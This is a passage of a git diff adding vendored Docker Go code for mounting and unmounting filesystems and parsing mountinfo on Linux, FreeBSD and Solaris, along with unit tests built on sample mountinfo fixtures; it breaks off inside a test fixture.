mode 100644 index 0000000000..66ac4bf472 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mount.go @@ -0,0 +1,74 @@ +package mount + +import ( + "time" +) + +// GetMounts retrieves a list of mounts for the current running process. +func GetMounts() ([]*Info, error) { + return parseMountTable() +} + +// Mounted determines if a specified mountpoint has been mounted. +// On Linux it looks at /proc/self/mountinfo and on Solaris at mnttab. +func Mounted(mountpoint string) (bool, error) { + entries, err := parseMountTable() + if err != nil { + return false, err + } + + // Search the table for the mountpoint + for _, e := range entries { + if e.Mountpoint == mountpoint { + return true, nil + } + } + return false, nil +} + +// Mount will mount filesystem according to the specified configuration, on the +// condition that the target path is *not* already mounted. Options must be +// specified like the mount or fstab unix commands: "opt1=val1,opt2=val2". See +// flags.go for supported option flags. +func Mount(device, target, mType, options string) error { + flag, _ := parseOptions(options) + if flag&REMOUNT != REMOUNT { + if mounted, err := Mounted(target); err != nil || mounted { + return err + } + } + return ForceMount(device, target, mType, options) +} + +// ForceMount will mount a filesystem according to the specified configuration, +// *regardless* if the target path is not already mounted. Options must be +// specified like the mount or fstab unix commands: "opt1=val1,opt2=val2". See +// flags.go for supported option flags. +func ForceMount(device, target, mType, options string) error { + flag, data := parseOptions(options) + if err := mount(device, target, mType, uintptr(flag), data); err != nil { + return err + } + return nil +} + +// Unmount will unmount the target filesystem, so long as it is mounted. +func Unmount(target string) error { + if mounted, err := Mounted(target); err != nil || !mounted { + return err + } + return ForceUnmount(target) +} + +// ForceUnmount will force an unmount of the target filesystem, regardless if +// it is mounted or not. +func ForceUnmount(target string) (err error) { + // Simple retry logic for unmount + for i := 0; i < 10; i++ { + if err = unmount(target, 0); err == nil { + return nil + } + time.Sleep(100 * time.Millisecond) + } + return +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go new file mode 100644 index 0000000000..253aff3b8e --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mount_unix_test.go @@ -0,0 +1,162 @@ +// +build !windows,!solaris + +package mount + +import ( + "os" + "path" + "testing" +) + +func TestMountOptionsParsing(t *testing.T) { + options := "noatime,ro,size=10k" + + flag, data := parseOptions(options) + + if data != "size=10k" { + t.Fatalf("Expected size=10 got %s", data) + } + + expectedFlag := NOATIME | RDONLY + + if flag != expectedFlag { + t.Fatalf("Expected %d got %d", expectedFlag, flag) + } +} + +func TestMounted(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + sourcePath = path.Join(sourceDir, "file.txt") + targetPath = path.Join(targetDir, "file.txt") + ) + + os.Mkdir(sourceDir, 0777) + os.Mkdir(targetDir, 0777) + + f, err := os.Create(sourcePath) + if err != nil { + t.Fatal(err) + } + f.WriteString("hello") + f.Close() + + f, err = os.Create(targetPath) + if err != nil { + t.Fatal(err) + } + f.Close() + + if err := Mount(sourceDir, targetDir, "none", "bind,rw"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + mounted, err := Mounted(targetDir) + if err != nil { + t.Fatal(err) + } + if !mounted { + t.Fatalf("Expected %s to be mounted", targetDir) + } + if _, err := os.Stat(targetDir); err != nil { + t.Fatal(err) + } +} + +func TestMountReadonly(t *testing.T) { + tmp := path.Join(os.TempDir(), "mount-tests") + if err := os.MkdirAll(tmp, 0777); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + var ( + sourceDir = path.Join(tmp, "source") + targetDir = path.Join(tmp, "target") + sourcePath = path.Join(sourceDir, "file.txt") + targetPath = path.Join(targetDir, "file.txt") + ) + + os.Mkdir(sourceDir, 0777) + os.Mkdir(targetDir, 0777) + + f, err := os.Create(sourcePath) + if err != nil { + t.Fatal(err) + } + f.WriteString("hello") + f.Close() + + f, err = os.Create(targetPath) + if err != nil { + t.Fatal(err) + } + f.Close() + + if err := Mount(sourceDir, targetDir, "none", "bind,ro"); err != nil { + t.Fatal(err) + } + defer func() { + if err := Unmount(targetDir); err != nil { + t.Fatal(err) + } + }() + + f, err = os.OpenFile(targetPath, os.O_RDWR, 0777) + if err == nil { + t.Fatal("Should not be able to open a ro file as rw") + } +} + +func TestGetMounts(t *testing.T) { + mounts, err := GetMounts() + if err != nil { + t.Fatal(err) + } + + root := false + for _, entry := range mounts { + if entry.Mountpoint == "/" { + root = true + } + } + + if !root { + t.Fatal("/ should be mounted at least") + } +} + +func TestMergeTmpfsOptions(t *testing.T) { + options := []string{"noatime", "ro", "size=10k", "defaults", "atime", "defaults", "rw", "rprivate", "size=1024k", "slave"} + expected := []string{"atime", "rw", "size=1024k", "slave"} + merged, err := MergeTmpfsOptions(options) + if err != nil { + t.Fatal(err) + } + if len(expected) != len(merged) { + t.Fatalf("Expected %s got %s", expected, merged) + } + for index := range merged { + if merged[index] != expected[index] { + t.Fatalf("Expected %s for the %dth option, got %s", expected, index, merged) + } + } + + options = []string{"noatime", "ro", "size=10k", "atime", "rw", "rprivate", "size=1024k", "slave", "size"} + _, err = MergeTmpfsOptions(options) + if err == nil { + t.Fatal("Expected error got nil") + } +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go new file mode 100644 index 0000000000..bb870e6f59 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_freebsd.go @@ -0,0 +1,59 @@ +package mount + +/* +#include +#include +#include +#include +#include +#include +*/ +import "C" + +import ( + "fmt" + "strings" + "syscall" + "unsafe" +) + +func allocateIOVecs(options []string) []C.struct_iovec { + out := make([]C.struct_iovec, len(options)) + for i, option := range options { + out[i].iov_base = unsafe.Pointer(C.CString(option)) + out[i].iov_len = C.size_t(len(option) + 1) + } + return out +} + +func mount(device, target, mType string, flag uintptr, data string) error { + isNullFS := false + + xs := strings.Split(data, ",") + for _, x := range xs { + if x == "bind" { + isNullFS = true + } + } + + options := []string{"fspath", target} + if isNullFS { + options = append(options, "fstype", "nullfs", "target", device) + } else { + options = append(options, "fstype", mType, "from", device) + } + rawOptions := allocateIOVecs(options) + for _, rawOption := range rawOptions { + defer C.free(rawOption.iov_base) + } + + if errno := C.nmount(&rawOptions[0], C.uint(len(options)), C.int(flag)); errno != 0 { + reason := C.GoString(C.strerror(*C.__error())) + return fmt.Errorf("Failed to call nmount: %s", reason) + } + return nil +} + +func unmount(target string, flag int) error { + return syscall.Unmount(target, flag) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go new file mode 100644 index 0000000000..dd4280c777 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_linux.go @@ -0,0 +1,21 @@ +package mount + +import ( + "syscall" +) + +func mount(device, target, mType string, flag uintptr, data string) error { + if err := syscall.Mount(device, target, mType, flag, data); err != nil { + return err + } + + // If we have a bind mount or remount, remount... + if flag&syscall.MS_BIND == syscall.MS_BIND && flag&syscall.MS_RDONLY == syscall.MS_RDONLY { + return syscall.Mount(device, target, mType, flag|syscall.MS_REMOUNT, data) + } + return nil +} + +func unmount(target string, flag int) error { + return syscall.Unmount(target, flag) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go new file mode 100644 index 0000000000..c684aa81fc --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go @@ -0,0 +1,33 @@ +// +build solaris,cgo + +package mount + +import ( + "golang.org/x/sys/unix" + "unsafe" +) + +// #include +// #include +// #include +// int Mount(const char *spec, const char *dir, int mflag, +// char *fstype, char *dataptr, int datalen, char *optptr, int optlen) { +// return mount(spec, dir, mflag, fstype, dataptr, datalen, optptr, optlen); +// } +import "C" + +func mount(device, target, mType string, flag uintptr, data string) error { + spec := C.CString(device) + dir := C.CString(target) + fstype := C.CString(mType) + _, err := C.Mount(spec, dir, C.int(flag), fstype, nil, 0, nil, 0) + C.free(unsafe.Pointer(spec)) + C.free(unsafe.Pointer(dir)) + C.free(unsafe.Pointer(fstype)) + return err +} + +func unmount(target string, flag int) error { + err := unix.Unmount(target, flag) + return err +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go new file mode 100644 index 0000000000..a2a3bb457f --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go @@ -0,0 +1,11 @@ +// +build !linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo + +package mount + +func mount(device, target, mType string, flag uintptr, data string) error { + panic("Not implemented") +} + +func unmount(target string, flag int) error { + panic("Not implemented") +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go new file mode 100644 index 0000000000..e3fc3535e9 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go @@ -0,0 +1,40 @@ +package mount + +// Info reveals information about a particular mounted filesystem. This +// struct is populated from the content in the /proc//mountinfo file. +type Info struct { + // ID is a unique identifier of the mount (may be reused after umount). + ID int + + // Parent indicates the ID of the mount parent (or of self for the top of the + // mount tree). + Parent int + + // Major indicates one half of the device ID which identifies the device class. + Major int + + // Minor indicates one half of the device ID which identifies a specific + // instance of device. + Minor int + + // Root of the mount within the filesystem. + Root string + + // Mountpoint indicates the mount point relative to the process's root. + Mountpoint string + + // Opts represents mount-specific options. + Opts string + + // Optional represents optional fields. + Optional string + + // Fstype indicates the type of filesystem, such as EXT3. + Fstype string + + // Source indicates filesystem specific information or "none". + Source string + + // VfsOpts represents per super block options. + VfsOpts string +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go new file mode 100644 index 0000000000..4f32edcd90 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go @@ -0,0 +1,41 @@ +package mount + +/* +#include +#include +#include +*/ +import "C" + +import ( + "fmt" + "reflect" + "unsafe" +) + +// Parse /proc/self/mountinfo because comparing Dev and ino does not work from +// bind mounts. +func parseMountTable() ([]*Info, error) { + var rawEntries *C.struct_statfs + + count := int(C.getmntinfo(&rawEntries, C.MNT_WAIT)) + if count == 0 { + return nil, fmt.Errorf("Failed to call getmntinfo") + } + + var entries []C.struct_statfs + header := (*reflect.SliceHeader)(unsafe.Pointer(&entries)) + header.Cap = count + header.Len = count + header.Data = uintptr(unsafe.Pointer(rawEntries)) + + var out []*Info + for _, entry := range entries { + var mountinfo Info + mountinfo.Mountpoint = C.GoString(&entry.f_mntonname[0]) + mountinfo.Source = C.GoString(&entry.f_mntfromname[0]) + mountinfo.Fstype = C.GoString(&entry.f_fstypename[0]) + out = append(out, &mountinfo) + } + return out, nil +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go new file mode 100644 index 0000000000..be69fee1d7 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go @@ -0,0 +1,95 @@ +// +build linux + +package mount + +import ( + "bufio" + "fmt" + "io" + "os" + "strings" +) + +const ( + /* 36 35 98:0 /mnt1 /mnt2 rw,noatime master:1 - ext3 /dev/root rw,errors=continue + (1)(2)(3) (4) (5) (6) (7) (8) (9) (10) (11) + + (1) mount ID: unique identifier of the mount (may be reused after umount) + (2) parent ID: ID of parent (or of self for the top of the mount tree) + (3) major:minor: value of st_dev for files on filesystem + (4) root: root of the mount within the filesystem + (5) mount point: mount point relative to the process's root + (6) mount options: per mount options + (7) optional fields: zero or more fields of the form "tag[:value]" + (8) separator: marks the end of the optional fields + (9) filesystem type: name of filesystem of the form "type[.subtype]" + (10) mount source: filesystem specific information or "none" + (11) super options: per super block options*/ + mountinfoFormat = "%d %d %d:%d %s %s %s %s" +) + +// Parse /proc/self/mountinfo because comparing Dev and ino does not work from +// bind mounts +func parseMountTable() ([]*Info, error) { + f, err := os.Open("/proc/self/mountinfo") + if err != nil { + return nil, err + } + defer f.Close() + + return parseInfoFile(f) +} + +func parseInfoFile(r io.Reader) ([]*Info, error) { + var ( + s = bufio.NewScanner(r) + out = []*Info{} + ) + + for s.Scan() { + if err := s.Err(); err != nil { + return nil, err + } + + var ( + p = &Info{} + text = s.Text() + optionalFields string + ) + + if _, err := fmt.Sscanf(text, mountinfoFormat, + &p.ID, &p.Parent, &p.Major, &p.Minor, + &p.Root, &p.Mountpoint, &p.Opts, &optionalFields); err != nil { + return nil, fmt.Errorf("Scanning '%s' failed: %s", text, err) + } + // Safe as mountinfo encodes mountpoints with spaces as \040. + index := strings.Index(text, " - ") + postSeparatorFields := strings.Fields(text[index+3:]) + if len(postSeparatorFields) < 3 { + return nil, fmt.Errorf("Error found less than 3 fields post '-' in %q", text) + } + + if optionalFields != "-" { + p.Optional = optionalFields + } + + p.Fstype = postSeparatorFields[0] + p.Source = postSeparatorFields[1] + p.VfsOpts = strings.Join(postSeparatorFields[2:], " ") + out = append(out, p) + } + return out, nil +} + +// PidMountInfo collects the mounts for a specific process ID. If the process +// ID is unknown, it is better to use `GetMounts` which will inspect +// "/proc/self/mountinfo" instead. +func PidMountInfo(pid int) ([]*Info, error) { + f, err := os.Open(fmt.Sprintf("/proc/%d/mountinfo", pid)) + if err != nil { + return nil, err + } + defer f.Close() + + return parseInfoFile(f) +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go new file mode 100644 index 0000000000..bd100e1d49 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go @@ -0,0 +1,476 @@ +// +build linux + +package mount + +import ( + "bytes" + "testing" +) + +const ( + fedoraMountinfo = `15 35 0:3 / /proc rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw + 16 35 0:14 / /sys rw,nosuid,nodev,noexec,relatime shared:6 - sysfs sysfs rw,seclabel + 17 35 0:5 / /dev rw,nosuid shared:2 - devtmpfs devtmpfs rw,seclabel,size=8056484k,nr_inodes=2014121,mode=755 + 18 16 0:15 / /sys/kernel/security rw,nosuid,nodev,noexec,relatime shared:7 - securityfs securityfs rw + 19 16 0:13 / /sys/fs/selinux rw,relatime shared:8 - selinuxfs selinuxfs rw + 20 17 0:16 / /dev/shm rw,nosuid,nodev shared:3 - tmpfs tmpfs rw,seclabel + 21 17 0:10 / /dev/pts rw,nosuid,noexec,relatime shared:4 - devpts devpts rw,seclabel,gid=5,mode=620,ptmxmode=000 + 22 35 0:17 / /run rw,nosuid,nodev shared:21 - tmpfs tmpfs rw,seclabel,mode=755 + 23 16 0:18 / /sys/fs/cgroup rw,nosuid,nodev,noexec shared:9 - tmpfs tmpfs rw,seclabel,mode=755 + 24 23 0:19 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime shared:10 - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd + 25 16 0:20 / /sys/fs/pstore rw,nosuid,nodev,noexec,relatime shared:20 - pstore pstore rw + 26 23 0:21 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,cpuset,clone_children + 27 23 0:22 / /sys/fs/cgroup/cpu,cpuacct rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,cpuacct,cpu,clone_children + 28 23 0:23 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime shared:13 - cgroup cgroup rw,memory,clone_children + 29 23 0:24 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime shared:14 - cgroup cgroup rw,devices,clone_children + 30 23 0:25 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime shared:15 - cgroup cgroup rw,freezer,clone_children + 31 23 0:26 / /sys/fs/cgroup/net_cls rw,nosuid,nodev,noexec,relatime shared:16 - cgroup cgroup rw,net_cls,clone_children + 32 23 0:27 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime shared:17 - cgroup cgroup rw,blkio,clone_children + 33 23 0:28 / /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime shared:18 - cgroup cgroup rw,perf_event,clone_children + 34 23 0:29 / /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime shared:19 - cgroup cgroup rw,hugetlb,clone_children + 35 1 253:2 / / rw,relatime shared:1 - ext4 /dev/mapper/ssd-root--f20 rw,seclabel,data=ordered + 36 15 0:30 / /proc/sys/fs/binfmt_misc rw,relatime shared:22 - autofs systemd-1 rw,fd=38,pgrp=1,timeout=300,minproto=5,maxproto=5,direct + 37 17 0:12 / /dev/mqueue rw,relatime shared:23 - mqueue mqueue rw,seclabel + 38 35 0:31 / /tmp rw shared:24 - tmpfs tmpfs rw,seclabel + 39 17 0:32 / /dev/hugepages rw,relatime shared:25 - hugetlbfs hugetlbfs rw,seclabel + 40 16 0:7 / /sys/kernel/debug rw,relatime shared:26 - debugfs debugfs rw + 41 16 0:33 / /sys/kernel/config rw,relatime shared:27 - configfs configfs rw + 42 35 0:34 / /var/lib/nfs/rpc_pipefs rw,relatime shared:28 - rpc_pipefs sunrpc rw + 43 15 0:35 / /proc/fs/nfsd rw,relatime shared:29 - nfsd sunrpc rw + 45 35 8:17 / /boot rw,relatime shared:30 - ext4 /dev/sdb1 rw,seclabel,data=ordered + 46 35 253:4 / /home rw,relatime shared:31 - ext4 /dev/mapper/ssd-home rw,seclabel,data=ordered + 47 35 253:5 / /var/lib/libvirt/images rw,noatime,nodiratime shared:32 - ext4 /dev/mapper/ssd-virt rw,seclabel,discard,data=ordered + 48 35 253:12 / /mnt/old rw,relatime shared:33 - ext4 /dev/mapper/HelpDeskRHEL6-FedoraRoot rw,seclabel,data=ordered + 121 22 0:36 / /run/user/1000/gvfs rw,nosuid,nodev,relatime shared:104 - fuse.gvfsd-fuse gvfsd-fuse rw,user_id=1000,group_id=1000 + 124 16 0:37 / /sys/fs/fuse/connections rw,relatime shared:107 - fusectl fusectl rw + 165 38 253:3 / /tmp/mnt rw,relatime shared:147 - ext4 /dev/mapper/ssd-root rw,seclabel,data=ordered + 167 35 253:15 / /var/lib/docker/devicemapper/mnt/aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,relatime shared:149 - ext4 /dev/mapper/docker-253:2-425882-aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,seclabel,discard,stripe=16,data=ordered + 171 35 253:16 / /var/lib/docker/devicemapper/mnt/c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,relatime shared:153 - ext4 /dev/mapper/docker-253:2-425882-c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,seclabel,discard,stripe=16,data=ordered + 175 35 253:17 / /var/lib/docker/devicemapper/mnt/1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,relatime shared:157 - ext4 /dev/mapper/docker-253:2-425882-1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,seclabel,discard,stripe=16,data=ordered + 179 35 253:18 / /var/lib/docker/devicemapper/mnt/d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,relatime shared:161 - ext4 /dev/mapper/docker-253:2-425882-d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,seclabel,discard,stripe=16,data=ordered + 183 35 253:19 / /var/lib/docker/devicemapper/mnt/6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,relatime shared:165 - ext4 /dev/mapper/docker-253:2-425882-6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,seclabel,discard,stripe=16,data=ordered + 187 35 253:20 / /var/lib/docker/devicemapper/mnt/8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,relatime shared:169 - ext4 /dev/mapper/docker-253:2-425882-8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,seclabel,discard,stripe=16,data=ordered + 191 35 253:21 / /var/lib/docker/devicemapper/mnt/c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,relatime shared:173 - ext4 /dev/mapper/docker-253:2-425882-c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,seclabel,discard,stripe=16,data=ordered + 195 35 253:22 / /var/lib/docker/devicemapper/mnt/2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,relatime shared:177 - ext4 /dev/mapper/docker-253:2-425882-2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,seclabel,discard,stripe=16,data=ordered + 199 35 253:23 / /var/lib/docker/devicemapper/mnt/37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,relatime shared:181 - ext4 /dev/mapper/docker-253:2-425882-37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,seclabel,discard,stripe=16,data=ordered + 203 35 253:24 / /var/lib/docker/devicemapper/mnt/aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,relatime shared:185 - ext4 /dev/mapper/docker-253:2-425882-aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,seclabel,discard,stripe=16,data=ordered + 207 35 253:25 / /var/lib/docker/devicemapper/mnt/928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,relatime shared:189 - ext4 /dev/mapper/docker-253:2-425882-928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,seclabel,discard,stripe=16,data=ordered + 211 35 253:26 / /var/lib/docker/devicemapper/mnt/0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,relatime shared:193 - ext4 /dev/mapper/docker-253:2-425882-0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,seclabel,discard,stripe=16,data=ordered + 215 35 253:27 / /var/lib/docker/devicemapper/mnt/d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,relatime shared:197 - ext4 /dev/mapper/docker-253:2-425882-d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,seclabel,discard,stripe=16,data=ordered + 219 35 253:28 / /var/lib/docker/devicemapper/mnt/bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,relatime shared:201 - ext4 /dev/mapper/docker-253:2-425882-bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,seclabel,discard,stripe=16,data=ordered + 223 35 253:29 / /var/lib/docker/devicemapper/mnt/7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,relatime shared:205 - ext4 /dev/mapper/docker-253:2-425882-7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,seclabel,discard,stripe=16,data=ordered + 227 35 253:30 / /var/lib/docker/devicemapper/mnt/c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,relatime shared:209 - ext4 /dev/mapper/docker-253:2-425882-c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,seclabel,discard,stripe=16,data=ordered + 231 35 253:31 / /var/lib/docker/devicemapper/mnt/8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,relatime shared:213 - ext4 /dev/mapper/docker-253:2-425882-8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,seclabel,discard,stripe=16,data=ordered + 235 35 253:32 / /var/lib/docker/devicemapper/mnt/1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,relatime shared:217 - ext4 /dev/mapper/docker-253:2-425882-1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,seclabel,discard,stripe=16,data=ordered + 239 35 253:33 / /var/lib/docker/devicemapper/mnt/e9aa60c60128cad1 rw,relatime shared:221 - ext4 /dev/mapper/docker-253:2-425882-e9aa60c60128cad1 rw,seclabel,discard,stripe=16,data=ordered + 243 35 253:34 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,relatime shared:225 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,seclabel,discard,stripe=16,data=ordered + 247 35 253:35 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,relatime shared:229 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,seclabel,discard,stripe=16,data=ordered + 31 21 0:23 / /DATA/foo_bla_bla rw,relatime - cifs //foo/BLA\040BLA\040BLA/ rw,sec=ntlm,cache=loose,unc=\\foo\BLA BLA BLA,username=my_login,domain=mydomain.com,uid=12345678,forceuid,gid=12345678,forcegid,addr=10.1.30.10,file_mode=0755,dir_mode=0755,nounix,rsize=61440,wsize=65536,actimeo=1` + + ubuntuMountInfo = `15 20 0:14 / /sys rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw +16 20 0:3 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw +17 20 0:5 / /dev rw,relatime - devtmpfs udev rw,size=1015140k,nr_inodes=253785,mode=755 +18 17 0:11 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=000 +19 20 0:15 / /run rw,nosuid,noexec,relatime - tmpfs tmpfs rw,size=205044k,mode=755 +20 1 253:0 / / rw,relatime - ext4 /dev/disk/by-label/DOROOT rw,errors=remount-ro,data=ordered +21 15 0:16 / /sys/fs/cgroup rw,relatime - tmpfs none rw,size=4k,mode=755 +22 15 0:17 / /sys/fs/fuse/connections rw,relatime - fusectl none rw +23 15 0:6 / /sys/kernel/debug rw,relatime - debugfs none rw +24 15 0:10 / /sys/kernel/security rw,relatime - securityfs none rw +25 19 0:18 / /run/lock rw,nosuid,nodev,noexec,relatime - tmpfs none rw,size=5120k +26 21 0:19 / /sys/fs/cgroup/cpuset rw,relatime - cgroup cgroup rw,cpuset,clone_children +27 19 0:20 / /run/shm rw,nosuid,nodev,relatime - tmpfs none rw +28 21 0:21 / /sys/fs/cgroup/cpu rw,relatime - cgroup cgroup rw,cpu +29 19 0:22 / /run/user rw,nosuid,nodev,noexec,relatime - tmpfs none rw,size=102400k,mode=755 +30 15 0:23 / /sys/fs/pstore rw,relatime - pstore none rw +31 21 0:24 / /sys/fs/cgroup/cpuacct rw,relatime - cgroup cgroup rw,cpuacct +32 21 0:25 / /sys/fs/cgroup/memory rw,relatime - cgroup cgroup rw,memory +33 21 0:26 / /sys/fs/cgroup/devices rw,relatime - cgroup cgroup rw,devices +34 21 0:27 / /sys/fs/cgroup/freezer rw,relatime - cgroup cgroup rw,freezer +35 21 0:28 / /sys/fs/cgroup/blkio rw,relatime - cgroup cgroup rw,blkio +36 21 0:29 / /sys/fs/cgroup/perf_event rw,relatime - cgroup cgroup rw,perf_event +37 21 0:30 / /sys/fs/cgroup/hugetlb rw,relatime - cgroup cgroup rw,hugetlb +38 21 0:31 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime - cgroup systemd rw,name=systemd +39 20 0:32 / /var/lib/docker/aufs/mnt/b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc rw,relatime - aufs none rw,si=caafa54fdc06525 +40 20 0:33 / /var/lib/docker/aufs/mnt/2eed44ac7ce7c75af04f088ed6cb4ce9d164801e91d78c6db65d7ef6d572bba8-init rw,relatime - aufs none rw,si=caafa54f882b525 +41 20 0:34 / /var/lib/docker/aufs/mnt/2eed44ac7ce7c75af04f088ed6cb4ce9d164801e91d78c6db65d7ef6d572bba8 rw,relatime - aufs none rw,si=caafa54f8829525 +42 20 0:35 / /var/lib/docker/aufs/mnt/16f4d7e96dd612903f425bfe856762f291ff2e36a8ecd55a2209b7d7cd81c30b rw,relatime - aufs none rw,si=caafa54f882d525 +43 20 0:36 / /var/lib/docker/aufs/mnt/63ca08b75d7438a9469a5954e003f48ffede73541f6286ce1cb4d7dd4811da7e-init rw,relatime - aufs none rw,si=caafa54f882f525 +44 20 0:37 / /var/lib/docker/aufs/mnt/63ca08b75d7438a9469a5954e003f48ffede73541f6286ce1cb4d7dd4811da7e rw,relatime - aufs none rw,si=caafa54f88ba525 +45 20 0:38 / /var/lib/docker/aufs/mnt/283f35a910233c756409313be71ecd8fcfef0df57108b8d740b61b3e88860452 rw,relatime - aufs none rw,si=caafa54f88b8525 +46 20 0:39 / /var/lib/docker/aufs/mnt/2c6c7253d4090faa3886871fb21bd660609daeb0206588c0602007f7d0f254b1-init rw,relatime - aufs none rw,si=caafa54f88be525 +47 20 0:40 / /var/lib/docker/aufs/mnt/2c6c7253d4090faa3886871fb21bd660609daeb0206588c0602007f7d0f254b1 rw,relatime - aufs none rw,si=caafa54f882c525 +48 20 0:41 / 